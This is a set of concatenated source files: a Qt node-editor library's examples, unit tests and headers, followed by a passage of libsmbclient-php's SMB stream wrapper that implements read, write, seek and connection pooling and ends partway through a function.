<|start_filename|>examples/styles/models.cpp<|end_filename|>
#include "models.hpp"
// For some reason CMake could not generate moc files correctly
// without having a .cpp for a QObject declared in the .hpp.
<|start_filename|>examples/calculator/Converters.cpp<|end_filename|>
#include "Converters.hpp"
#include <QtGui/QDoubleValidator>
#include "DecimalData.hpp"
#include "IntegerData.hpp"
std::shared_ptr<NodeData>
DecimalToIntegerConverter::
operator()(std::shared_ptr<NodeData> data)
{
auto numberData =
std::dynamic_pointer_cast<DecimalData>(data);
if (numberData)
{
_integer = std::make_shared<IntegerData>(numberData->number());
}
else
{
_integer.reset();
}
return _integer;
}
std::shared_ptr<NodeData>
IntegerToDecimalConverter::
operator()(std::shared_ptr<NodeData> data)
{
auto numberData =
std::dynamic_pointer_cast<IntegerData>(data);
if (numberData)
{
_decimal = std::make_shared<DecimalData>(numberData->number());
}
else
{
_decimal.reset();
}
return _decimal;
}
<|start_filename|>test/src/TestDataModelRegistry.cpp<|end_filename|>
#include <nodes/DataModelRegistry>
#include <catch2/catch.hpp>
#include "StubNodeDataModel.hpp"
using QtNodes::DataModelRegistry;
using QtNodes::NodeData;
using QtNodes::NodeDataModel;
using QtNodes::NodeDataType;
using QtNodes::PortIndex;
using QtNodes::PortType;
namespace
{
class StubModelStaticName : public StubNodeDataModel
{
public:
static QString
Name()
{
return "Name";
}
};
}
TEST_CASE("DataModelRegistry::registerModel", "[interface]")
{
DataModelRegistry registry;
SECTION("stub model")
{
registry.registerModel<StubNodeDataModel>();
auto model = registry.create("name");
CHECK(model->name() == "name");
}
SECTION("stub model with static name")
{
registry.registerModel<StubModelStaticName>();
auto model = registry.create("Name");
CHECK(model->name() == "name");
}
SECTION("From model creator function")
{
SECTION("non-static name()")
{
registry.registerModel([] {
return std::make_unique<StubNodeDataModel>();
});
auto model = registry.create("name");
REQUIRE(model != nullptr);
CHECK(model->name() == "name");
CHECK(dynamic_cast<StubNodeDataModel*>(model.get()));
}
SECTION("static Name()")
{
registry.registerModel([] {
return std::make_unique<StubModelStaticName>();
});
auto model = registry.create("Name");
REQUIRE(model != nullptr);
CHECK(model->name() == "name");
CHECK(dynamic_cast<StubModelStaticName*>(model.get()));
}
}
}
<|start_filename|>include/nodes/internal/QUuidStdHash.hpp<|end_filename|>
#pragma once
#include <functional>
#include <QtCore/QUuid>
#include <QtCore/QVariant>
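// Specializing std::hash for QUuid lets QUuid be used directly as a key in
// std::unordered_map / std::unordered_set; the work is delegated to Qt's qHash().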
namespace std
{
template<>
struct hash<QUuid>
{
inline
std::size_t
operator()(QUuid const& uid) const
{
return qHash(uid);
}
};
}
<|start_filename|>test/src/TestFlowScene.cpp<|end_filename|>
#include <nodes/FlowScene>
#include <functional>
#include <memory>
#include <utility>
#include <vector>
#include <nodes/Node>
#include <nodes/NodeDataModel>
#include <catch2/catch.hpp>
#include "ApplicationSetup.hpp"
#include "Stringify.hpp"
#include "StubNodeDataModel.hpp"
using QtNodes::Connection;
using QtNodes::DataModelRegistry;
using QtNodes::FlowScene;
using QtNodes::Node;
using QtNodes::NodeData;
using QtNodes::NodeDataModel;
using QtNodes::NodeDataType;
using QtNodes::PortIndex;
using QtNodes::PortType;
TEST_CASE("FlowScene triggers connections created or deleted", "[gui]")
{
struct MockDataModel : StubNodeDataModel
{
unsigned int nPorts(PortType) const override { return 1; }
void
inputConnectionCreated(Connection const&) override
{
inputCreatedCalledCount++;
}
void
inputConnectionDeleted(Connection const&) override
{
inputDeletedCalledCount++;
}
void
outputConnectionCreated(Connection const&) override
{
outputCreatedCalledCount++;
}
void
outputConnectionDeleted(Connection const&) override
{
outputDeletedCalledCount++;
}
int inputCreatedCalledCount = 0;
int inputDeletedCalledCount = 0;
int outputCreatedCalledCount = 0;
int outputDeletedCalledCount = 0;
void
resetCallCounts()
{
inputCreatedCalledCount = 0;
inputDeletedCalledCount = 0;
outputCreatedCalledCount = 0;
outputDeletedCalledCount = 0;
}
};
auto setup = applicationSetup();
FlowScene scene;
Node& fromNode = scene.createNode(std::make_unique<MockDataModel>());
Node& toNode = scene.createNode(std::make_unique<MockDataModel>());
Node& unrelatedNode = scene.createNode(std::make_unique<MockDataModel>());
auto& fromNgo = fromNode.nodeGraphicsObject();
auto& toNgo = toNode.nodeGraphicsObject();
auto& unrelatedNgo = unrelatedNode.nodeGraphicsObject();
fromNgo.setPos(0, 0);
toNgo.setPos(200, 20);
unrelatedNgo.setPos(-100, -100);
auto& from = dynamic_cast<MockDataModel&>(*fromNode.nodeDataModel());
auto& to = dynamic_cast<MockDataModel&>(*toNode.nodeDataModel());
auto& unrelated = dynamic_cast<MockDataModel&>(*unrelatedNode.nodeDataModel());
SECTION("creating half a connection (not finishing the connection)")
{
auto connection = scene.createConnection(PortType::Out, fromNode, 0);
CHECK(from.inputCreatedCalledCount == 0);
CHECK(from.outputCreatedCalledCount == 0);
CHECK(to.inputCreatedCalledCount == 0);
CHECK(to.outputCreatedCalledCount == 0);
CHECK(unrelated.inputCreatedCalledCount == 0);
CHECK(unrelated.outputCreatedCalledCount == 0);
scene.deleteConnection(*connection);
}
struct Creation
{
std::string name;
std::function<std::shared_ptr<Connection>()> createConnection;
};
Creation sceneCreation{"scene.createConnection",
[&] { return scene.createConnection(toNode, 0, fromNode, 0); }};
Creation partialCreation{"scene.createConnection-by partial", [&] {
auto connection = scene.createConnection(PortType::Out, fromNode, 0);
connection->setNodeToPort(toNode, PortType::In, 0);
return connection;
}};
struct Deletion
{
std::string name;
std::function<void(Connection & connection)> deleteConnection;
};
Deletion sceneDeletion{"scene.deleteConnection",
[&](Connection & c) { scene.deleteConnection(c); }};
Deletion partialDragDeletion{"scene-deleteConnectionByDraggingOff",
[&](Connection & c)
{
PortIndex portIndex = c.getPortIndex(PortType::In);
Node * node = c.getNode(PortType::In);
node->nodeState().getEntries(PortType::In)[portIndex].clear();
c.clearNode(PortType::In);
}};
SECTION("creating a connection")
{
std::vector<Creation> cases({sceneCreation, partialCreation});
for (Creation const& create : cases)
{
SECTION(create.name)
{
auto connection = create.createConnection();
CHECK(from.inputCreatedCalledCount == 0);
CHECK(from.outputCreatedCalledCount == 1);
CHECK(to.inputCreatedCalledCount == 1);
CHECK(to.outputCreatedCalledCount == 0);
CHECK(unrelated.inputCreatedCalledCount == 0);
CHECK(unrelated.outputCreatedCalledCount == 0);
scene.deleteConnection(*connection);
}
}
}
SECTION("deleting a connection")
{
std::vector<Deletion> cases({sceneDeletion, partialDragDeletion});
for (auto const& deletion : cases)
{
SECTION("deletion: " + deletion.name)
{
Connection & connection = *sceneCreation.createConnection();
from.resetCallCounts();
to.resetCallCounts();
deletion.deleteConnection(connection);
// Here the Connection reference becomes dangling
CHECK(from.inputDeletedCalledCount == 0);
CHECK(from.outputDeletedCalledCount == 1);
CHECK(to.inputDeletedCalledCount == 1);
CHECK(to.outputDeletedCalledCount == 0);
CHECK(unrelated.inputDeletedCalledCount == 0);
CHECK(unrelated.outputDeletedCalledCount == 0);
}
}
}
}
TEST_CASE("FlowScene's DataModelRegistry outlives nodes and connections", "[asan][gui]")
{
class MockDataModel : public StubNodeDataModel
{
public:
MockDataModel(int* const& incrementOnDestruction)
: incrementOnDestruction(incrementOnDestruction)
{
}
~MockDataModel()
{
(*incrementOnDestruction)++;
}
// The reference ensures that we point into memory that would be freed
// if the DataModelRegistry doesn't outlive this node
int* const& incrementOnDestruction;
};
struct MockDataModelCreator
{
MockDataModelCreator(int* shouldBeAliveWhenAssignedTo)
: shouldBeAliveWhenAssignedTo(shouldBeAliveWhenAssignedTo)
{
}
auto
operator()() const
{
return std::make_unique<MockDataModel>(shouldBeAliveWhenAssignedTo);
}
int* shouldBeAliveWhenAssignedTo;
};
int modelsDestroyed = 0;
// Introduce a new scope, so that modelsDestroyed will be alive even after the
// FlowScene is destroyed.
{
auto setup = applicationSetup();
auto registry = std::make_shared<DataModelRegistry>();
registry->registerModel(MockDataModelCreator(&modelsDestroyed));
modelsDestroyed = 0;
FlowScene scene(std::move(registry));
auto& node = scene.createNode(scene.registry().create("name"));
// On destruction, if this `node` outlives its MockDataModelCreator,
// (if it outlives the DataModelRegistry), then we trigger undefined
// behavior through use-after-free. ASAN will catch that.
}
CHECK(modelsDestroyed == 1);
}
<|start_filename|>include/nodes/internal/Serializable.hpp<|end_filename|>
#pragma once
#include <QtCore/QJsonObject>
namespace QtNodes
{
class Serializable
{
public:
virtual
~Serializable() = default;
virtual
QJsonObject
save() const = 0;
virtual void
restore(QJsonObject const & /*p*/) {}
};
}
<|start_filename|>include/nodes/internal/Compiler.hpp<|end_filename|>
#pragma once
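// Detects the current compiler from its predefined macros and exposes it through
// the NODE_EDITOR_COMPILER* defines used elsewhere (e.g. by Export.hpp).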
#if \
defined (__MINGW32__) || \
defined (__MINGW64__)
# define NODE_EDITOR_COMPILER "MinGW"
# define NODE_EDITOR_COMPILER_MINGW
#elif \
defined (__GNUC__)
# define NODE_EDITOR_COMPILER "GNU"
# define NODE_EDITOR_COMPILER_GNU
# define NODE_EDITOR_COMPILER_GNU_VERSION_MAJOR __GNUC__
# define NODE_EDITOR_COMPILER_GNU_VERSION_MINOR __GNUC_MINOR__
# define NODE_EDITOR_COMPILER_GNU_VERSION_PATCH __GNUC_PATCHLEVEL__
#elif \
defined (__clang__)
# define NODE_EDITOR_COMPILER "Clang"
# define NODE_EDITOR_COMPILER_CLANG
#elif \
defined (_MSC_VER)
# define NODE_EDITOR_COMPILER "Microsoft Visual C++"
# define NODE_EDITOR_COMPILER_MICROSOFT
#elif \
defined (__BORLANDC__)
# define NODE_EDITOR_COMPILER "Borland C++ Builder"
# define NODE_EDITOR_COMPILER_BORLAND
#elif \
defined (__CODEGEARC__)
# define NODE_EDITOR_COMPILER "CodeGear C++ Builder"
# define NODE_EDITOR_COMPILER_CODEGEAR
#elif \
defined (__INTEL_COMPILER) || \
defined (__ICL)
# define NODE_EDITOR_COMPILER "Intel C++"
# define NODE_EDITOR_COMPILER_INTEL
#elif \
defined (__xlC__) || \
defined (__IBMCPP__)
# define NODE_EDITOR_COMPILER "IBM XL C++"
# define NODE_EDITOR_COMPILER_IBM
#elif \
defined (__HP_aCC)
# define NODE_EDITOR_COMPILER "HP aC++"
# define NODE_EDITOR_COMPILER_HP
#elif \
defined (__WATCOMC__)
# define NODE_EDITOR_COMPILER "Watcom C++"
# define NODE_EDITOR_COMPILER_WATCOM
#endif
#ifndef NODE_EDITOR_COMPILER
# error "Current compiler is not supported."
#endif
<|start_filename|>examples/calculator/main.cpp<|end_filename|>
#include <nodes/NodeData>
#include <nodes/FlowScene>
#include <nodes/FlowView>
#include <nodes/ConnectionStyle>
#include <nodes/TypeConverter>
#include <QtWidgets/QApplication>
#include <QtWidgets/QVBoxLayout>
#include <QtWidgets/QMenuBar>
#include <nodes/DataModelRegistry>
#include "NumberSourceDataModel.hpp"
#include "NumberDisplayDataModel.hpp"
#include "AdditionModel.hpp"
#include "SubtractionModel.hpp"
#include "MultiplicationModel.hpp"
#include "DivisionModel.hpp"
#include "ModuloModel.hpp"
#include "Converters.hpp"
using QtNodes::DataModelRegistry;
using QtNodes::FlowScene;
using QtNodes::FlowView;
using QtNodes::ConnectionStyle;
using QtNodes::TypeConverter;
using QtNodes::TypeConverterId;
static std::shared_ptr<DataModelRegistry>
registerDataModels()
{
auto ret = std::make_shared<DataModelRegistry>();
ret->registerModel<NumberSourceDataModel>("Sources");
ret->registerModel<NumberDisplayDataModel>("Displays");
ret->registerModel<AdditionModel>("Operators");
ret->registerModel<SubtractionModel>("Operators");
ret->registerModel<MultiplicationModel>("Operators");
ret->registerModel<DivisionModel>("Operators");
ret->registerModel<ModuloModel>("Operators");
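// Type converters are registered per (source type, destination type) pair, so the
// scene can convert data when a Decimal output is wired to an Integer input and
// vice versa.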
ret->registerTypeConverter(std::make_pair(DecimalData().type(),
IntegerData().type()),
TypeConverter{DecimalToIntegerConverter()});
ret->registerTypeConverter(std::make_pair(IntegerData().type(),
DecimalData().type()),
TypeConverter{IntegerToDecimalConverter()});
return ret;
}
static
void
setStyle()
{
ConnectionStyle::setConnectionStyle(
R"(
{
"ConnectionStyle": {
"ConstructionColor": "gray",
"NormalColor": "black",
"SelectedColor": "gray",
"SelectedHaloColor": "deepskyblue",
"HoveredColor": "deepskyblue",
"LineWidth": 3.0,
"ConstructionLineWidth": 2.0,
"PointDiameter": 10.0,
"UseDataDefinedColors": true
}
}
)");
}
int
main(int argc, char *argv[])
{
QApplication app(argc, argv);
setStyle();
QWidget mainWidget;
auto menuBar = new QMenuBar();
auto saveAction = menuBar->addAction("Save..");
auto loadAction = menuBar->addAction("Load..");
QVBoxLayout *l = new QVBoxLayout(&mainWidget);
l->addWidget(menuBar);
auto scene = new FlowScene(registerDataModels(), &mainWidget);
l->addWidget(new FlowView(scene));
l->setContentsMargins(0, 0, 0, 0);
l->setSpacing(0);
QObject::connect(saveAction, &QAction::triggered,
scene, &FlowScene::save);
QObject::connect(loadAction, &QAction::triggered,
scene, &FlowScene::load);
mainWidget.setWindowTitle("Dataflow tools: simplest calculator");
mainWidget.resize(800, 600);
mainWidget.showNormal();
return app.exec();
}
<|start_filename|>examples/images/ImageLoaderModel.cpp<|end_filename|>
#include "ImageLoaderModel.hpp"
#include <QtCore/QEvent>
#include <QtCore/QDir>
#include <QtWidgets/QFileDialog>
ImageLoaderModel::
ImageLoaderModel()
: _label(new QLabel("Double click to load image"))
{
_label->setAlignment(Qt::AlignVCenter | Qt::AlignHCenter);
QFont f = _label->font();
f.setBold(true);
f.setItalic(true);
_label->setFont(f);
_label->setFixedSize(200, 200);
_label->installEventFilter(this);
}
unsigned int
ImageLoaderModel::
nPorts(PortType portType) const
{
unsigned int result = 1;
switch (portType)
{
case PortType::In:
result = 0;
break;
case PortType::Out:
result = 1;
default:
break;
}
return result;
}
bool
ImageLoaderModel::
eventFilter(QObject *object, QEvent *event)
{
if (object == _label)
{
int w = _label->width();
int h = _label->height();
if (event->type() == QEvent::MouseButtonPress)
{
QString fileName =
QFileDialog::getOpenFileName(nullptr,
tr("Open Image"),
QDir::homePath(),
tr("Image Files (*.png *.jpg *.bmp)"));
_pixmap = QPixmap(fileName);
_label->setPixmap(_pixmap.scaled(w, h, Qt::KeepAspectRatio));
Q_EMIT dataUpdated(0);
return true;
}
else if (event->type() == QEvent::Resize)
{
if (!_pixmap.isNull())
_label->setPixmap(_pixmap.scaled(w, h, Qt::KeepAspectRatio));
}
}
return false;
}
NodeDataType
ImageLoaderModel::
dataType(PortType, PortIndex) const
{
return PixmapData().type();
}
std::shared_ptr<NodeData>
ImageLoaderModel::
outData(PortIndex)
{
return std::make_shared<PixmapData>(_pixmap);
}
<|start_filename|>examples/styles/main.cpp<|end_filename|>
#include <QtWidgets/QApplication>
#include <nodes/NodeData>
#include <nodes/FlowScene>
#include <nodes/FlowView>
#include <nodes/DataModelRegistry>
#include <nodes/NodeStyle>
#include <nodes/FlowViewStyle>
#include <nodes/ConnectionStyle>
#include "models.hpp"
using QtNodes::DataModelRegistry;
using QtNodes::FlowScene;
using QtNodes::FlowView;
using QtNodes::FlowViewStyle;
using QtNodes::NodeStyle;
using QtNodes::ConnectionStyle;
static std::shared_ptr<DataModelRegistry>
registerDataModels()
{
auto ret = std::make_shared<DataModelRegistry>();
ret->registerModel<MyDataModel>();
return ret;
}
static
void
setStyle()
{
FlowViewStyle::setStyle(
R"(
{
"FlowViewStyle": {
"BackgroundColor": [255, 255, 240],
"FineGridColor": [245, 245, 230],
"CoarseGridColor": [235, 235, 220]
}
}
)");
NodeStyle::setNodeStyle(
R"(
{
"NodeStyle": {
"NormalBoundaryColor": "darkgray",
"SelectedBoundaryColor": "deepskyblue",
"GradientColor0": "mintcream",
"GradientColor1": "mintcream",
"GradientColor2": "mintcream",
"GradientColor3": "mintcream",
"ShadowColor": [200, 200, 200],
"FontColor": [10, 10, 10],
"FontColorFaded": [100, 100, 100],
"ConnectionPointColor": "white",
"PenWidth": 2.0,
"HoveredPenWidth": 2.5,
"ConnectionPointDiameter": 10.0,
"Opacity": 1.0
}
}
)");
ConnectionStyle::setConnectionStyle(
R"(
{
"ConnectionStyle": {
"ConstructionColor": "gray",
"NormalColor": "black",
"SelectedColor": "gray",
"SelectedHaloColor": "deepskyblue",
"HoveredColor": "deepskyblue",
"LineWidth": 3.0,
"ConstructionLineWidth": 2.0,
"PointDiameter": 10.0,
"UseDataDefinedColors": false
}
}
)");
}
//------------------------------------------------------------------------------
int
main(int argc, char* argv[])
{
QApplication app(argc, argv);
setStyle();
FlowScene scene(registerDataModels());
FlowView view(&scene);
view.setWindowTitle("Style example");
view.resize(800, 600);
view.show();
return app.exec();
}
<|start_filename|>include/nodes/internal/Export.hpp<|end_filename|>
#pragma once
#include "Compiler.hpp"
#include "OperatingSystem.hpp"
#ifdef NODE_EDITOR_PLATFORM_WINDOWS
# define NODE_EDITOR_EXPORT __declspec(dllexport)
# define NODE_EDITOR_IMPORT __declspec(dllimport)
# define NODE_EDITOR_LOCAL
#elif \
NODE_EDITOR_COMPILER_GNU_VERSION_MAJOR >= 4 || \
defined (NODE_EDITOR_COMPILER_CLANG)
# define NODE_EDITOR_EXPORT __attribute__((visibility("default")))
# define NODE_EDITOR_IMPORT __attribute__((visibility("default")))
# define NODE_EDITOR_LOCAL __attribute__((visibility("hidden")))
#else
# define NODE_EDITOR_EXPORT
# define NODE_EDITOR_IMPORT
# define NODE_EDITOR_LOCAL
#endif
#ifdef __cplusplus
# define NODE_EDITOR_DEMANGLED extern "C"
#else
# define NODE_EDITOR_DEMANGLED
#endif
#if defined (NODE_EDITOR_SHARED) && !defined (NODE_EDITOR_STATIC)
# ifdef NODE_EDITOR_EXPORTS
# define NODE_EDITOR_PUBLIC NODE_EDITOR_EXPORT
# else
# define NODE_EDITOR_PUBLIC NODE_EDITOR_IMPORT
# endif
# define NODE_EDITOR_PRIVATE NODE_EDITOR_LOCAL
#elif !defined (NODE_EDITOR_SHARED) && defined (NODE_EDITOR_STATIC)
# define NODE_EDITOR_PUBLIC
# define NODE_EDITOR_PRIVATE
#elif defined (NODE_EDITOR_SHARED) && defined (NODE_EDITOR_STATIC)
# ifdef NODE_EDITOR_EXPORTS
# error "Cannot build as shared and static simultaneously."
# else
# error "Cannot link against shared and static simultaneously."
# endif
#else
# ifdef NODE_EDITOR_EXPORTS
# error "Choose whether to build as shared or static."
# else
# error "Choose whether to link against shared or static."
# endif
#endif
<|start_filename|>smb_streams.c<|end_filename|>
/* ------------------------------------------------------------------
* This file is part of libsmbclient-php: Samba bindings for PHP.
* Libsmbclient-php is licensed under the BSD 2-clause license:
* ------------------------------------------------------------------
*
* Copyright (c) 2003, <NAME>
* 2009 - 2014, <NAME>
* 2013 - 2015, <NAME>
* 2015, <NAME>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following
* disclaimer in the documentation and/or other materials provided
* with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
* CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS
* BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
* TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
* ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
* TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
* THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* ------------------------------------------------------------------
*/
#ifdef HAVE_CONFIG_H
#include "config.h"
#endif
#include "php.h"
#include "ext/standard/url.h"
#include "ext/standard/info.h"
#include "ext/standard/php_filestat.h"
#include "ext/standard/sha1.h"
#include "php_smbclient.h"
#include <libsmbclient.h>
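/* Fetches the per-stream private data that the openers below store in
 * stream->abstract; used at the top of every stream operation. */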
#define STREAM_DATA_FROM_STREAM() \
php_smb_stream_data *self = (php_smb_stream_data *) stream->abstract;
typedef struct _php_smb_stream_data {
php_smbclient_state *state;
SMBCFILE *handle;
/* pointers cache for multiple call */
smbc_read_fn smbc_read;
smbc_readdir_fn smbc_readdir;
smbc_write_fn smbc_write;
smbc_lseek_fn smbc_lseek;
smbc_ftruncate_fn smbc_ftruncate;
} php_smb_stream_data;
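/* Connection pooling: each SMBCCTX is keyed by a SHA1 hash of the
 * smb://workgroup;user:pass@server/ prefix of the URL plus the workgroup,
 * username and password context options, so streams targeting the same server
 * with the same credentials share one context. php_smb_pool_drop() releases a
 * reference; php_smb_pool_cleanup() runs at request shutdown. */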
static php_smbclient_state *php_smb_pool_get(php_stream_context *context, const char *url TSRMLS_DC)
{
PHP_SHA1_CTX sha1;
unsigned char hash[20];
struct _php_smb_pool *pool;
/* Create a hash of the connection parameters */
PHP_SHA1Init(&sha1);
if (!memcmp(url, "smb://", 6)) {
char *p;
p = strchr(url+6, '/'); // we only want smb://workgroup;user:pass@server/
PHP_SHA1Update(&sha1, (const unsigned char *)url+6, p ? p - url - 6 : strlen(url+6));
}
if (context) {
#if PHP_MAJOR_VERSION >= 7
zval *tmpzval;
if (NULL != (tmpzval = php_stream_context_get_option(context, "smb", "workgroup"))) {
if (Z_TYPE_P(tmpzval) == IS_STRING) {
PHP_SHA1Update(&sha1, (const unsigned char *)Z_STRVAL_P(tmpzval), Z_STRLEN_P(tmpzval)+1);
}
}
if (NULL != (tmpzval = php_stream_context_get_option(context, "smb", "username"))) {
if (Z_TYPE_P(tmpzval) == IS_STRING) {
PHP_SHA1Update(&sha1, (const unsigned char *)Z_STRVAL_P(tmpzval), Z_STRLEN_P(tmpzval)+1);
}
}
if (NULL != (tmpzval = php_stream_context_get_option(context, "smb", "password"))) {
if (Z_TYPE_P(tmpzval) == IS_STRING) {
PHP_SHA1Update(&sha1, (const unsigned char *)Z_STRVAL_P(tmpzval), Z_STRLEN_P(tmpzval)+1);
}
}
#else
zval **tmpzval;
if (php_stream_context_get_option(context, "smb", "workgroup", &tmpzval) == SUCCESS) {
if (Z_TYPE_PP(tmpzval) == IS_STRING) {
PHP_SHA1Update(&sha1, (const unsigned char *)Z_STRVAL_PP(tmpzval), Z_STRLEN_PP(tmpzval)+1);
}
}
if (php_stream_context_get_option(context, "smb", "username", &tmpzval) == SUCCESS) {
if (Z_TYPE_PP(tmpzval) == IS_STRING) {
PHP_SHA1Update(&sha1, (const unsigned char *)Z_STRVAL_PP(tmpzval), Z_STRLEN_PP(tmpzval)+1);
}
}
if (php_stream_context_get_option(context, "smb", "password", &tmpzval) == SUCCESS) {
if (Z_TYPE_PP(tmpzval) == IS_STRING) {
PHP_SHA1Update(&sha1, (const unsigned char *)Z_STRVAL_PP(tmpzval), Z_STRLEN_PP(tmpzval)+1);
}
}
#endif
}
PHP_SHA1Final(hash, &sha1);
/* Reuse state from pool if exists */
for (pool = SMBCLIENT_G(pool_first); pool; pool = pool->next) {
if (!memcmp(hash, pool->hash, 20)) {
pool->nb++;
return pool->state;
}
}
/* Create a new state and save it in the pool */
pool = emalloc(sizeof(*pool));
memcpy(pool->hash, hash, 20);
pool->nb = 1;
pool->next = SMBCLIENT_G(pool_first);
pool->state = php_smbclient_state_new(context, 1 TSRMLS_CC);
SMBCLIENT_G(pool_first) = pool;
return pool->state;
}
static void php_smb_pool_drop(php_smbclient_state *state TSRMLS_DC)
{
struct _php_smb_pool *pool;
for (pool = SMBCLIENT_G(pool_first); pool; pool = pool->next) {
if (pool->state == state) {
pool->nb--;
return;
}
}
/* Not found (after php_smb_pool_cleanup) so close it */
php_smbclient_state_free(state TSRMLS_CC);
}
void php_smb_pool_cleanup(TSRMLS_D) {
struct _php_smb_pool *pool;
pool = SMBCLIENT_G(pool_first);
while (pool) {
struct _php_smb_pool *next = pool->next;
if (!pool->nb) { /* Keep the state alive when a stream still uses it */
php_smbclient_state_free(pool->state TSRMLS_CC);
}
efree(pool);
pool = next;
}
SMBCLIENT_G(pool_first) = NULL;
}
static int php_smb_ops_close(php_stream *stream, int close_handle TSRMLS_DC)
{
smbc_close_fn smbc_close;
STREAM_DATA_FROM_STREAM();
if (!self) {
return EOF;
}
if (close_handle) {
if (self->handle) {
smbc_close = smbc_getFunctionClose(self->state->ctx);
if (smbc_close) {
smbc_close(self->state->ctx, self->handle);
}
self->handle = NULL;
}
}
php_smb_pool_drop(self->state TSRMLS_CC);
efree(self);
stream->abstract = NULL;
return EOF;
}
static int php_smb_ops_flush(php_stream *stream TSRMLS_DC)
{
return 0;
}
#if PHP_VERSION_ID < 70400
static size_t php_smb_ops_read(php_stream *stream, char *buf, size_t count TSRMLS_DC)
#else
static ssize_t php_smb_ops_read(php_stream *stream, char *buf, size_t count TSRMLS_DC)
#endif
{
ssize_t n = 0;
STREAM_DATA_FROM_STREAM();
if (!self || !self->handle) {
return 0;
}
if (!self->smbc_read) {
self->smbc_read = smbc_getFunctionRead(self->state->ctx);
}
if (self->smbc_read) {
n = self->smbc_read(self->state->ctx, self->handle, buf, count);
}
/* cast count to signed value to avoid possibly negative n being cast to unsigned value */
if (n == 0 || n < (ssize_t)count) {
stream->eof = 1;
}
#if PHP_VERSION_ID < 70400
return (n < 1 ? 0 : (size_t)n);
#else
return n;
#endif
}
#if PHP_VERSION_ID < 70400
static size_t php_smb_ops_write(php_stream *stream, const char *buf, size_t count TSRMLS_DC)
#else
static ssize_t php_smb_ops_write(php_stream *stream, const char *buf, size_t count TSRMLS_DC)
#endif
{
ssize_t len = 0;
STREAM_DATA_FROM_STREAM();
if (!self || !self->handle) {
return 0;
}
if (!self->smbc_write) {
self->smbc_write = smbc_getFunctionWrite(self->state->ctx);
}
if (self->smbc_write) {
len = self->smbc_write(self->state->ctx, self->handle, buf, count);
}
#if PHP_VERSION_ID < 70400
return (len < 0 ? 0 : (size_t)len);
#else
return len;
#endif
}
static int php_smb_ops_stat(php_stream *stream, php_stream_statbuf *ssb TSRMLS_DC) /* {{{ */
{
smbc_fstat_fn smbc_fstat;
STREAM_DATA_FROM_STREAM();
if (!self || !self->handle) {
return -1;
}
if ((smbc_fstat = smbc_getFunctionFstat(self->state->ctx)) == NULL) {
return -1;
}
if (smbc_fstat(self->state->ctx, self->handle, &ssb->sb) < 0) {
return -1;
}
return 0;
}
static int php_smb_ops_seek(php_stream *stream, off_t offset, int whence, off_t *newoffset TSRMLS_DC)
{
STREAM_DATA_FROM_STREAM();
if (!self || !self->handle) {
return -1;
}
if (!self->smbc_lseek) {
self->smbc_lseek = smbc_getFunctionLseek(self->state->ctx);
}
if (self->smbc_lseek) {
*newoffset = self->smbc_lseek(self->state->ctx, self->handle, offset, whence);
return 0;
}
return -1;
}
static int php_smb_ops_set_option(php_stream *stream, int option, int value, void *ptrparam TSRMLS_DC)
{
size_t newsize;
STREAM_DATA_FROM_STREAM();
if (!self || !self->handle) {
return PHP_STREAM_OPTION_RETURN_ERR;
}
if (!self->smbc_ftruncate) {
self->smbc_ftruncate = smbc_getFunctionFtruncate(self->state->ctx);
}
if (!self->smbc_ftruncate) {
return PHP_STREAM_OPTION_RETURN_ERR;
}
switch(option) {
case PHP_STREAM_OPTION_TRUNCATE_API:
switch (value) {
case PHP_STREAM_TRUNCATE_SUPPORTED:
return PHP_STREAM_OPTION_RETURN_OK;
case PHP_STREAM_TRUNCATE_SET_SIZE:
newsize = *(size_t*)ptrparam;
if (self->smbc_ftruncate(self->state->ctx, self->handle, newsize) == 0) {
return PHP_STREAM_OPTION_RETURN_OK;
}
return PHP_STREAM_OPTION_RETURN_ERR;
}
}
return PHP_STREAM_OPTION_RETURN_NOTIMPL;
}
static php_stream_ops php_stream_smbio_ops = {
php_smb_ops_write,
php_smb_ops_read,
php_smb_ops_close,
php_smb_ops_flush,
"smb",
php_smb_ops_seek,
NULL, /* cast */
php_smb_ops_stat,
php_smb_ops_set_option
};
static php_stream *
php_stream_smb_opener(
php_stream_wrapper *wrapper,
#if PHP_VERSION_ID < 50600
char *path,
char *mode,
#else
const char *path,
const char *mode,
#endif
int options,
#if PHP_MAJOR_VERSION < 7
char **opened_path,
#else
zend_string **opened_path,
#endif
php_stream_context *context
STREAMS_DC TSRMLS_DC)
{
php_smbclient_state *state;
int smbflags;
long smbmode = 0666;
smbc_open_fn smbc_open;
SMBCFILE *handle;
php_smb_stream_data *self;
/* Context */
state = php_smb_pool_get(context, path TSRMLS_CC);
if (!state) {
return NULL;
}
/* File */
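/* The 'b' (binary) modifier is meaningless for SMB, so normalize it away
 * before mapping the mode string to SMB open flags. */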
if (!strcmp(mode, "wb")) {
mode = "w";
} else if (!strcmp(mode, "rb")) {
mode = "r";
}
if (flagstring_to_smbflags(mode, strlen(mode), &smbflags TSRMLS_CC) == 0) {
php_smb_pool_drop(state TSRMLS_CC);
return NULL;
}
if ((smbc_open = smbc_getFunctionOpen(state->ctx)) == NULL) {
php_smb_pool_drop(state TSRMLS_CC);
return NULL;
}
if ((handle = smbc_open(state->ctx, path, smbflags, smbmode)) == NULL) {
php_smb_pool_drop(state TSRMLS_CC);
return NULL;
}
self = ecalloc(sizeof(*self), 1);
self->state = state;
self->handle = handle;
